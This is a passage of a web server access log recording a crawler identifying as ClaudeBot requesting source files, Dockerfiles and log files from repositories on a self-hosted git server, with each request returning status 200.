+claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14830] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log?display=rendered" [Client 216.73.216.188] [Length 11147] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py?display=rendered" [Client 216.73.216.188] [Length 10971] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py?display=source" [Client 216.73.216.188] [Length 13386] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 1450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11091] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css" [Client 216.73.216.188] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 48135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2?display=source" [Client 216.73.216.188] [Length 31546] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11317] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 11532] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 10075] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py?display=rendered" [Client 216.73.216.188] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log?display=source" [Client 216.73.216.188] [Length 27892] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log?display=source" [Client 216.73.216.188] [Length 11202] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile?display=source" [Client 216.73.216.188] [Length 12465] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15558] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 216.73.216.188] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 1944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 1450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log?display=rendered" [Client 216.73.216.188] [Length 11178] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 13517] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log?display=source" [Client 216.73.216.188] [Length 16454] [Gzip 7.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 15766] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 69548] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 966] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 9453] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 9838] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11718] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 11529] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 950] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py?display=source" [Client 216.73.216.188] [Length 14293] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log?display=source" [Client 216.73.216.188] [Length 19975] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log?display=source" [Client 216.73.216.188] [Length 13088] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 22026] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13171] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 12995] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9954] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 216.73.216.188] [Length 11211] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py?display=source" [Client 216.73.216.188] [Length 16168] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 48131] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 11547] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 11553] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 9839] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 216.73.216.188] [Length 12415] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10939] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 216.73.216.188] [Length 11141] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 216.73.216.188] [Length 11183] [Gzip 3.04] [Sent-to 